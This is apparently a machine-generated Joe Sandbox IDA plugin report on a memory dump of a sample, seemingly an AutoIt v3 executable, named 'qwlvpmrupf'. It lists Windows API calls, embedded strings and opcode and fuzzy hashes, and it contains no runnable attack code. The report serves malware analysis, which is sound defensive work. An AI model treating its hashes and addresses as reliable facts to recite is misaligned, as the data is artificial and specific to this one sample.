                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: p3D$p3D$p3D$p3D$p5D$p5D$x3D$x3D
                                                • API String ID: 1385522511-1780764073
                                                • Opcode ID: f770730ec5207a34181b14c5b912830d02a1c9841e77048e4ca005e1cb6bc214
                                                • Instruction ID: 2abc1e725a26e6a38ecafb7ea714745e83a5386805ad8239845b08c4eddb4652
                                                • Opcode Fuzzy Hash: f770730ec5207a34181b14c5b912830d02a1c9841e77048e4ca005e1cb6bc214
                                                • Instruction Fuzzy Hash: CC32BF75A002059FDB26CF54C885FBAB7B9EF45300F26C06DE80AAB252C778ED41DB90

                                                Control-flow Graph
                                                APIs
                                                  • Part of subcall function 00377953: CloseHandle.KERNELBASE(?,?,00000000,003B3A1C), ref: 00377973
                                                  • Part of subcall function 00376E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00373B33,?,00008000), ref: 00376E80
                                                • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00373C17
                                                • _wcslen.LIBCMT ref: 00373C96
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00373D81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                • API String ID: 3350465876-3738523708
                                                • Opcode ID: a25fa10fef5c5b4d0c307be51029b5a68b80be6768cb6b402066e960f101f4aa
                                                • Instruction ID: 0832b33f4fb4bfeb8275fb055a5630c5b6f018863cb86e2cf366f0cd3967467a
                                                • Opcode Fuzzy Hash: a25fa10fef5c5b4d0c307be51029b5a68b80be6768cb6b402066e960f101f4aa
                                                • Instruction Fuzzy Hash: 9322C2314083419FC726EF24C851AAFBBF5BF95304F00891EF5899B2A2DB74DA48DB56
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: D5D$D5D$D5D$D5D$D5DD5D$Variable must be of type 'Object'.
                                                • API String ID: 0-3522529179
                                                • Opcode ID: c9273ca240143e27a0b0c35d0a52afdcf2cdd467d4b020b5fc857e223ba65b4f
                                                • Instruction ID: bdbadcf60cd189109000881db454e6913923f9dfe8b348d9264e3c4cf0183d1d
                                                • Opcode Fuzzy Hash: c9273ca240143e27a0b0c35d0a52afdcf2cdd467d4b020b5fc857e223ba65b4f
                                                • Instruction Fuzzy Hash: 1FC2AA75A00205DFCB26DF98C880BADB7F1BF09310F258169E949AB3A1D779ED41CB91
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 003815A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: D5D$D5D$D5D$D5D$D5DD5D
                                                • API String ID: 1385522511-811857780
                                                • Opcode ID: 9912794dd1568c0950d8e88cf8b5d98b6a5234851c7ba765e25f8d36d2c2036c
                                                • Instruction ID: ee402a13447d65e7cfde43a6985a8f41b4aae5668082d8cdf0e96fca27e542be
                                                • Opcode Fuzzy Hash: 9912794dd1568c0950d8e88cf8b5d98b6a5234851c7ba765e25f8d36d2c2036c
                                                • Instruction Fuzzy Hash: 93B2AD74A08300CFDB6AEF18C480A2AB7F5BF85700F25899DE9859B351D771ED85CB92

                                                Control-flow Graph
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00372A9B
                                                • CoUninitialize.COMBASE ref: 00372B3A
                                                • UnregisterHotKey.USER32(?), ref: 00372D1F
                                                • DestroyWindow.USER32(?), ref: 003B39F5
                                                • FreeLibrary.KERNEL32(?), ref: 003B3A5A
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003B3A87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 469580280-3243417748
                                                • Opcode ID: 676d4a6f403870ca22004d01712286041c2303c1fa3617deb7ad40f13fec0042
                                                • Instruction ID: 7902a5bb6053f30df40af5e39e54a216f67e48d564555d5bc8228d9c3a63b1a1
                                                • Opcode Fuzzy Hash: 676d4a6f403870ca22004d01712286041c2303c1fa3617deb7ad40f13fec0042
                                                • Instruction Fuzzy Hash: 8FD17D31701222CFCB2AEF15C895B6AF7A4BF04704F1582ADE94A6B651CB34ED16CF44

                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003E8907
                                                • SetCurrentDirectoryW.KERNELBASE(?), ref: 003E891B
                                                • GetFileAttributesW.KERNEL32(?), ref: 003E8945
                                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 003E895F
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003E8971
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003E89BA
                                                • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 003E8A0A
                                                Similarity
                                                • API ID: CurrentDirectory$AttributesFile
                                                • String ID: *.*
                                                • API String ID: 769691225-438819550

                                                APIs
                                                  • Part of subcall function 00373205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00373236
                                                  • Part of subcall function 00373205: MapVirtualKeyW.USER32(00000010,00000000), ref: 0037323E
                                                  • Part of subcall function 00373205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00373249
                                                  • Part of subcall function 00373205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00373254
                                                  • Part of subcall function 00373205: MapVirtualKeyW.USER32(00000011,00000000), ref: 0037325C
                                                  • Part of subcall function 00373205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00373264
                                                  • Part of subcall function 0037318C: RegisterWindowMessageW.USER32(00000004,?,00372906), ref: 003731E4
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003729AC
                                                • OleInitialize.OLE32 ref: 003729CA
                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 003B39E7
                                                Similarity
                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                • String ID: (&D$0$D$@(D$$D
                                                • API String ID: 1986988660-2548488434
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00373568
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00373589
                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,003732EF,?), ref: 0037359D
                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,003732EF,?), ref: 003735A6
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,003755EB,SwapMouseButtons,00000004,?), ref: 0037561C
                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,003755EB,SwapMouseButtons,00000004,?), ref: 0037563D
                                                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,003755EB,SwapMouseButtons,00000004,?), ref: 0037565F
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 3677997916-824357125
                                                APIs
                                                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 003CE73D
                                                • FreeLibrary.KERNEL32 ref: 003CE763
                                                Similarity
                                                • API ID: AddressFreeLibraryProc
                                                • String ID: GetSystemWow64DirectoryW$X64
                                                • API String ID: 3013587201-2590602151
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,0040DC30), ref: 003DDABB
                                                • GetLastError.KERNEL32 ref: 003DDACA
                                                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 003DDAD9
                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0040DC30), ref: 003DDB36
                                                Similarity
                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                • String ID:
                                                • API String ID: 2267087916-0
                                                APIs
                                                • GetOpenFileNameW.COMDLG32(?), ref: 003B4115
                                                  • Part of subcall function 0037557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00375558,?,?,003B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0037559E
                                                  • Part of subcall function 003739DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003739FD
                                                Similarity
                                                • API ID: Name$Path$FileFullLongOpen
                                                • String ID: X$`uC
                                                • API String ID: 779396738-341515719
                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 003909F8
                                                  • Part of subcall function 00393634: RaiseException.KERNEL32(?,?,?,00390A1A,?,00000000,?,?,?,?,?,?,00390A1A,00000000,00439758,00000000), ref: 00393694
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00390A15
                                                Similarity
                                                • API ID: Exception@8Throw$ExceptionRaise
                                                • String ID: Unknown exception
                                                • API String ID: 3476068407-410509341
                                                APIs
                                                Similarity
                                                • API ID: LocalTime
                                                • String ID: %.3d$X64
                                                • API String ID: 481472006-1077770165
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 003F8C52
                                                • TerminateProcess.KERNEL32(00000000), ref: 003F8C59
                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 003F8E3A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                • String ID:
                                                • API String ID: 146820519-0
                                                • Opcode ID: e25af36b492786213ec58893f64bcd173eb4668d8510225ae058bf7cf315f61f
                                                • Instruction ID: 5881a6a7606a9ac2617231cb9073ed94cd369b65cf0487a536992e4b0399c7a9
                                                • Opcode Fuzzy Hash: e25af36b492786213ec58893f64bcd173eb4668d8510225ae058bf7cf315f61f
                                                • Instruction Fuzzy Hash: 4A127B71A083449FC725DF28C484B6ABBE5FF88314F15895DE9898B392CB34ED45CB92
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00376CA1
                                                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00376CB1
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 753cc5166d9c94bb0b6564b3fdcd0794d6a0d38e88e91062f1c38b864b44e242
                                                • Instruction ID: 3a00553f5c314f3621d4dd8826c90237f42c7d747f6569fcc8ff72416e04757b
                                                • Opcode Fuzzy Hash: 753cc5166d9c94bb0b6564b3fdcd0794d6a0d38e88e91062f1c38b864b44e242
                                                • Instruction Fuzzy Hash: 3A31AD71A00A0AFFDB26CF68C981B99B7B4FB04714F15C229E919A7640C775FE94CB90
                                                APIs
                                                  • Part of subcall function 00375F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00376049
                                                • KillTimer.USER32(?,00000001,?,?), ref: 0038FD44
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0038FD53
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003CFDD3
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_Timer$Kill
                                                • String ID:
                                                • API String ID: 3500052701-0
                                                • Opcode ID: a32c7b466a1b2953548ab037d6d998db0cf3fc19c885a009bd01cea3ab52b32e
                                                • Instruction ID: e307ea824c5fc1253e54e22edb18a8be88bc1786ef69f7c7f38c2c6ba0db2c9c
                                                • Opcode Fuzzy Hash: a32c7b466a1b2953548ab037d6d998db0cf3fc19c885a009bd01cea3ab52b32e
                                                • Instruction Fuzzy Hash: 0931C575904744AFEB33CF348849BE6BBED9B16304F0004AEE6DA97245C7745E88CB55
                                                APIs
                                                • CloseHandle.KERNELBASE(00000000,00000000,?,?,003A895C,?,00439CE8,0000000C), ref: 003A8A94
                                                • GetLastError.KERNEL32(?,003A895C,?,00439CE8,0000000C), ref: 003A8A9E
                                                • __dosmaperr.LIBCMT ref: 003A8AC9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                • String ID:
                                                • API String ID: 2583163307-0
                                                • Opcode ID: 2ea618b66744e294fbd8e8a054362af12a5e5090412e260b097218b7514501ca
                                                • Instruction ID: 9344ffde7d9b122e52e05f4d0b99ff635fb3364a0516e1a07c999f2fd6e5aaeb
                                                • Opcode Fuzzy Hash: 2ea618b66744e294fbd8e8a054362af12a5e5090412e260b097218b7514501ca
                                                • Instruction Fuzzy Hash: 4C018E33A052604AE72727746C85B7E6749CB83734F2B062BF808EF0D2DE718CC58290
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,003A97CA,FF8BC369,00000000,00000002,00000000), ref: 003A9754
                                                • GetLastError.KERNEL32(?,003A97CA,FF8BC369,00000000,00000002,00000000,?,003A5EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00396F61), ref: 003A975E
                                                • __dosmaperr.LIBCMT ref: 003A9765
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastPointer__dosmaperr
                                                • String ID:
                                                • API String ID: 2336955059-0
                                                • Opcode ID: 227861b3f8aa36ab1d989135ef5f53be5bdd69743eddee521aac9c2300ecc853
                                                • Instruction ID: 077c1382dec946b513d19c8f525d72ded6481769a4e7fae811c3bd5dacd1980c
                                                • Opcode Fuzzy Hash: 227861b3f8aa36ab1d989135ef5f53be5bdd69743eddee521aac9c2300ecc853
                                                • Instruction Fuzzy Hash: F5014C32A20214AFCF069F99DC45D6E3B2EDB86330B24021AF811EB190EA72DD41C7A0
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 00382FB6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: CALL
                                                • API String ID: 1385522511-4196123274
                                                • Opcode ID: 1d3c3c01ec5e67f3c853053c5340adb272670915e9de1b9e8821b8a2a20c7296
                                                • Instruction ID: a79183aa5af918bfd4335acd94916763ab0a73ecf5616914cbaf1b4827461c46
                                                • Opcode Fuzzy Hash: 1d3c3c01ec5e67f3c853053c5340adb272670915e9de1b9e8821b8a2a20c7296
                                                • Instruction Fuzzy Hash: FF2279706083419FC726EF24C484B2ABBF5AF85314F25899DF8968B3A2D771ED45CB42
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d120b001e65988a535b6dbc201a5a222a61d7bbf22c30f42099f42afe59e9277
                                                • Instruction ID: 1dbdefff469b9695613bb9e04edbb81d8b7168356a117de6173a5a4b0cc98028
                                                • Opcode Fuzzy Hash: d120b001e65988a535b6dbc201a5a222a61d7bbf22c30f42099f42afe59e9277
                                                • Instruction Fuzzy Hash: 5532CE70A00205DFDB26EF64C882FAEB7B8EF05310F158599F856EB2A1D731AD45CB91
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003733E9,00442418,?,?,?,?,?,?,?,003732EF,?), ref: 00374227
                                                  • Part of subcall function 003784B7: _wcslen.LIBCMT ref: 003784CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FullNamePath_wcslen
                                                • String ID: $D
                                                • API String ID: 4019309064-1684598963
                                                • Opcode ID: 0047073f61291a044e6798f1ad39a07b141d7c26652b513821ddf4a23bbe4d64
                                                • Instruction ID: 840ffc7793f40803ab800e57148a26ca556aa2a6605546e2c1d95ff0c0ddcabf
                                                • Opcode Fuzzy Hash: 0047073f61291a044e6798f1ad39a07b141d7c26652b513821ddf4a23bbe4d64
                                                • Instruction Fuzzy Hash: 6911A53160020897DB62EBA89905EDD77FCAF09354B018466F948DB192DFB8E7849B15
                                                APIs
                                                • GetComputerNameW.KERNEL32(?,?), ref: 003CE6F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ComputerName
                                                • String ID: X64
                                                • API String ID: 3545744682-893830106
                                                • Opcode ID: f9d68bfa337d5a54b69ebcc2301bdc5ff0645c12ab541ffec5bac7e64a345e0d
                                                • Instruction ID: 12072dabec867e7b8a8817c54a66da0fed4c9e205d6ef675ee1c8d818312b627
                                                • Opcode Fuzzy Hash: f9d68bfa337d5a54b69ebcc2301bdc5ff0645c12ab541ffec5bac7e64a345e0d
                                                • Instruction Fuzzy Hash: AFD0C9B4815218EACB92DF80DC88EDD777CBB14300F2004A9F446E2400DB3469489B10
                                                APIs
                                                  • Part of subcall function 0037557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00375558,?,?,003B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0037559E
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 003E9665
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003E9673
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWrite$FullNamePath
                                                • String ID:
                                                • API String ID: 3876400906-0
                                                • Opcode ID: b57e4b73f4fc5a8856f6529e05028989b318644dc176fd8beb869179ac68e5e5
                                                • Instruction ID: eeec92f46f7ef3e9c0fc5fe9e2c905d8a8a224c9d21087808d10c2b8a12db87d
                                                • Opcode Fuzzy Hash: b57e4b73f4fc5a8856f6529e05028989b318644dc176fd8beb869179ac68e5e5
                                                • Instruction Fuzzy Hash: 6F1149396006259FCB22EF64C844D6EB7B5FF48320B058848E85AAB761CB34FC01CB90
                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00373B33,?,00008000), ref: 00376E80
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00373B33,?,00008000), ref: 003B59A2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: fd76b837149b404883c51a71927240d395863e152ce070256aa88410c8dbf3d6
                                                • Instruction ID: 17975ed028bbdaece659f85a9c0d1f22cc7d7831a8451a017b6e4f0ec7c866d6
